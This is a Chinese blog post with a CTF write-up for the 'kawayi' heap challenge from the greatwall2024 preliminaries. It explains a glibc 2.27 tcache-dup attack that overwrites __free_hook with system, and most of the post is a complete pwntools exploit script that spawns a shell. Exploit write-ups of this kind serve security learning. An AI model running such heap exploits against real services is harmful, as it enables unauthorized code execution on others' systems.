greatwall2024 初赛 - kawayi

RocketDev
  2024-03-31 21:53 2024-03-31 21:53 创建   2024-07-25 12:34:56 2024-07-25 12:34:56 更新      

文件属性

属性
Arch x64
RELRO Full
Canary on
NX on
PIE on
strip no
libc 2.27-3ubuntu1.6

解题思路

标准菜单题
允许申请0x430大的unsorted bin,有double free和uaf,考虑通过释放unsorted bin拿到libc, 然后打tcache dup写free_hook为system,再释放b'/bin/sh\0'的chunk就可以拿shell

EXPLOIT

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
from pwn import *
context.terminal = ['tmux','splitw','-h']
GOLD_TEXT = lambda x: f'\x1b[33m{x}\x1b[0m'

def payload(lo:int):
    global sh
    if lo:
        sh = process('./kawayi')
        if lo & 2:
            gdb.attach(sh)
    else:
        context.proxy = (socks.SOCKS5, '127.0.0.1', 1080)
        sh = remote('192.168.16.186', 8888) 
    libc = ELF('./libc.so.6') 

    def addn(idx:int, size:int, cont:bytes, hooked:bool=False): 
        sh.sendlineafter(b'exit', b'1')
        sh.sendlineafter(b'index', str(idx).encode())
        sh.sendlineafter(b'size', str(size).encode())
        sh.sendafter(b'talk', cont)

    def edit(idx:int, cont:bytes):
        sh.sendlineafter(b'exit', b'3')
        sh.sendlineafter(b'index', str(idx).encode())
        sh.sendafter(b'write', cont)

    def deln(idx:int):
        sh.sendlineafter(b'exit', b'2')
        sh.sendlineafter(b'index', str(idx).encode())

    def show(idx:int) -> bytes:
        sh.sendlineafter(b'exit', b'4')
        sh.sendlineafter(b'index?\n\n', str(idx).encode())
        return sh.recvline()

    def eout():
        sh.sendlineafter(b'exit', b'5')

    addn(0, 0x410, b' ')
    addn(1, 0x20, b' ') # prevent chunk 0 being merged into top chunk
    deln(0)
    ret = show(0)

    dumpArena = libc.symbols['__malloc_hook'] + (libc.symbols['__malloc_hook'] - libc.symbols['__realloc_hook']) * 2
    mainArena = u64(ret[:6] + b'\0\0') - 0x60 # sub unsorted bin offset
    libcBase = mainArena - dumpArena
    success(GOLD_TEXT(f'Leak libc: {hex(libcBase)}'))
    freeHook = libcBase + libc.symbols['__free_hook']
    system = libcBase + libc.symbols['system']

    # tcache dup
    deln(1)
    edit(1, p64(freeHook) + p64(0))
    deln(1)
    edit(1, p64(freeHook) + p64(0))
    addn(2, 0x20, p64(system))
    addn(3, 0x20, p64(system))
    # get shell
    edit(1, b'/bin/sh\0')
    deln(1)

    sh.clean()
    sh.interactive()

最后一分钟交的flag,真是蓟县

  • 标题: greatwall2024 初赛 - kawayi
  • 作者: RocketDev
  • 创建于 : 2024-03-31 21:53:00
  • 更新于 : 2024-07-25 12:34:56
  • 链接: https://rocketmadev.github.io/2024/03/31/kawayi/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论
目录
greatwall2024 初赛 - kawayi
  1. 文件属性
  2. 解题思路
  3. EXPLOIT